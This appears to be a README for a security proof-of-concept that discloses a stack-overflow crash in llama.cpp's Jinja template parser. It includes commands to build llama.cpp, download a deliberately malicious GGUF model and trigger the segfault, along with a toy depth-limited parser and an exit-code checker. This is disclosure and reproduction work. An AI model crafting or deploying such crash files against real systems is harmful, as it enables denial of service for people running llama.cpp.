PoC: Stack Overflow in llama.cpp Jinja Parser

This is a security research proof-of-concept. Do NOT use this model for inference.

This repository contains a minimal GGUF model file that triggers a stack overflow (SIGSEGV) in llama.cpp's Jinja template parser due to unbounded recursion in parse_if_expression() (common/jinja/parser.cpp).
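The failure mode can be illustrated with a toy recursive-descent parser. The sketch below is not llama.cpp code: the grammar, the names parse_ternary and nested_expression, and the MAX_DEPTH value are all hypothetical, chosen only to show how one stack frame per nesting level lets input size control stack usage, and how an explicit depth counter bounds it. In Python, unguarded recursion ends in a RecursionError rather than a SIGSEGV, but the shape of the problem is the same.

```python
MAX_DEPTH = 64  # hypothetical limit, not a value taken from llama.cpp


class DepthLimitExceeded(Exception):
    """Raised instead of letting the recursion run until the stack is exhausted."""


def parse_ternary(tokens, pos=0, depth=0):
    """Parse `atom ['if' atom 'else' ternary]` and return (ast, next_pos)."""
    if depth > MAX_DEPTH:
        raise DepthLimitExceeded(f"nesting deeper than {MAX_DEPTH}")
    if pos >= len(tokens):
        raise SyntaxError("unexpected end of input")
    value = tokens[pos]
    pos += 1
    if pos < len(tokens) and tokens[pos] == "if":
        # Required shape: 'if' <condition> 'else' <expression>
        if pos + 2 >= len(tokens) or tokens[pos + 2] != "else":
            raise SyntaxError("expected 'else' after condition")
        condition = tokens[pos + 1]
        # The else branch is parsed by the same function: one stack frame per level.
        else_branch, pos = parse_ternary(tokens, pos + 3, depth + 1)
        return ("if", value, condition, else_branch), pos
    return value, pos


def nested_expression(levels):
    """Build a token list containing `levels` nested ternary expressions."""
    return ("a if c else " * levels + "b").split()
```

With the guard in place, parse_ternary(nested_expression(10_000)) raises DepthLimitExceeded after MAX_DEPTH levels instead of recursing once per level of attacker-controlled input.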

Reproduction

git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
cmake -B build && cmake --build build -j
# Download the PoC model into the current directory
huggingface-cli download salvepilo/llama-cpp-jinja-crash-poc poc_crash_model.gguf --local-dir .
# Trigger the crash (no --jinja flag needed)
./build/bin/llama-cli -m poc_crash_model.gguf -p 'hello'
# Expected: Segmentation fault (exit code 139)
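Exit code 139 is how a POSIX shell reports a process killed by signal 11 (128 + 11, SIGSEGV). When the reproduction is scripted, Python's subprocess module reports the same event as a negative return code instead. The following is a minimal sketch for checking the result automatically; the helper names describe_exit and run_poc are hypothetical, and the binary and model paths are the ones used in the commands above.

```python
import signal
import subprocess


def describe_exit(returncode):
    """Translate a shell-style (128 + N) or subprocess-style (-N) code into text."""
    if returncode < 0:
        signum = -returncode          # subprocess convention: killed by signal N
    elif returncode > 128:
        signum = returncode - 128     # shell convention: 128 + N
    else:
        return f"exited normally with code {returncode}"
    try:
        name = signal.Signals(signum).name
    except ValueError:
        name = f"signal {signum}"
    return f"killed by {name}"


def run_poc(binary="./build/bin/llama-cli", model="poc_crash_model.gguf"):
    """Run the reproduction command and describe how the process ended."""
    result = subprocess.run(
        [binary, "-m", model, "-p", "hello"],
        stdin=subprocess.DEVNULL,
        capture_output=True,
    )
    return describe_exit(result.returncode)
```

On an affected build, run_poc() would be expected to return "killed by SIGSEGV"; any other result suggests the build is not affected or the model file was not found.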

Files

  • poc_crash_model.gguf - Malicious GGUF with deeply nested Jinja chat template
  • craft_full_gguf_poc.py - Python script to regenerate the PoC file
GGUF metadata

  • Model size: 12.4k params
  • Architecture: llama